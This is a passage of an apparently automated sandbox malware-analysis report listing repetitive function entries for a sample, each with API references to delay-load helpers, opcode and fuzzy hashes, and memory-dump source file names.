                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: Fjuns
                                                                                              • API String ID: 1269201914-22545314
                                                                                              • Opcode ID: 6437bc5e725bff520f95d8a94a2ef3b4d50cd4afb5e135c50f76ae7010641e0d
                                                                                              • Instruction ID: f8df0129333290d6b736b76e0f00b1333c4cba1ca7d78415d3eacac73b3f21ca
                                                                                              • Opcode Fuzzy Hash: 6437bc5e725bff520f95d8a94a2ef3b4d50cd4afb5e135c50f76ae7010641e0d
                                                                                              • Instruction Fuzzy Hash: 11B012C1A98100FC310461985E0ADB7015CC0C0F16730523EF804C10C2EC8C0F150531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E593 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: Fjuns
                                                                                              • API String ID: 1269201914-22545314
                                                                                              • Opcode ID: aec5d58d4fcf4faac53f874e2b101baefc9ae2b1578e0b997580411edc47b27a
                                                                                              • Instruction ID: c54eef1d7d1b9be1be6719bd88ae61aa8a9e5716e5675f7bf9b9f6f0af140625
                                                                                              • Opcode Fuzzy Hash: aec5d58d4fcf4faac53f874e2b101baefc9ae2b1578e0b997580411edc47b27a
                                                                                              • Instruction Fuzzy Hash: 8BB012C1A98104FD310461581D0ADB7014CC0C0F15730503EF804C10C2E88C0E140532
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 9fbf25ac2b9b5b0b499d60e8f4e2f5d0a66c47882acc1be45cba97e426716483
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: 9fbf25ac2b9b5b0b499d60e8f4e2f5d0a66c47882acc1be45cba97e426716483
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 78b1d1c5a6f38b0db07ac8aa785b8a1325c4a077024dff318175c84e392efffb
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: 78b1d1c5a6f38b0db07ac8aa785b8a1325c4a077024dff318175c84e392efffb
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 70a14ca12acb4df2adbeb500d60d71127bf138d9ff39a95dbbff793352fb2c8e
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: 70a14ca12acb4df2adbeb500d60d71127bf138d9ff39a95dbbff793352fb2c8e
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: fedc325d7e4e38f192449028dbefbbfe3b5d8dfc763e06f80b5518c73f6febdd
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: fedc325d7e4e38f192449028dbefbbfe3b5d8dfc763e06f80b5518c73f6febdd
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 091328a83e43285806315bf606f450be3d6a47de8f44cd993739081eebeb9e15
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: 091328a83e43285806315bf606f450be3d6a47de8f44cd993739081eebeb9e15
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 42cb8370aaf8bf681e892f04eb68d36d1388720af1edab64a0d3cd89f0e9c8e3
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: 42cb8370aaf8bf681e892f04eb68d36d1388720af1edab64a0d3cd89f0e9c8e3
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E2B9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 74b954b9480d32e3ae32a4e2d314c9bd3eda1f446e26fb1481bd484e3eed68ee
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: 74b954b9480d32e3ae32a4e2d314c9bd3eda1f446e26fb1481bd484e3eed68ee
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: d19974a8d1c359e1f2802d20bc8e5baf3e0ff41f7fd802058d9d3d56d2d47437
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: d19974a8d1c359e1f2802d20bc8e5baf3e0ff41f7fd802058d9d3d56d2d47437
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 6aec787217c4f83b00eb7bfdbaa2949db78949ed0002d2ed827cdcb807fa2733
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: 6aec787217c4f83b00eb7bfdbaa2949db78949ed0002d2ed827cdcb807fa2733
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 87ad042eed76bff47b91e26ea67042eb76ee97f9f97e69d0b78882ded0b6f561
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: 87ad042eed76bff47b91e26ea67042eb76ee97f9f97e69d0b78882ded0b6f561
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: d9b9dd08ba32aaa1bac5e9338c75c6d9c837649bbd80bca1997a38cf13d47b99
                                                                                              • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                              • Opcode Fuzzy Hash: d9b9dd08ba32aaa1bac5e9338c75c6d9c837649bbd80bca1997a38cf13d47b99
                                                                                              • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E573 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: Fjuns
                                                                                              • API String ID: 1269201914-22545314
                                                                                              • Opcode ID: 407d5b45297d13a4bf8f2a2e0f3a808fd3960a1622d17995a2ed722ae911ce95
                                                                                              • Instruction ID: 673788784031477a865c1c81b17a015ff38145b412ed599fbaac47098e89f92b
                                                                                              • Opcode Fuzzy Hash: 407d5b45297d13a4bf8f2a2e0f3a808fd3960a1622d17995a2ed722ae911ce95
                                                                                              • Instruction Fuzzy Hash: B4A011C2AA8200FC300822A02E0ACBB020CC0C0B2AB30A22EF800800C2A8880A280830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
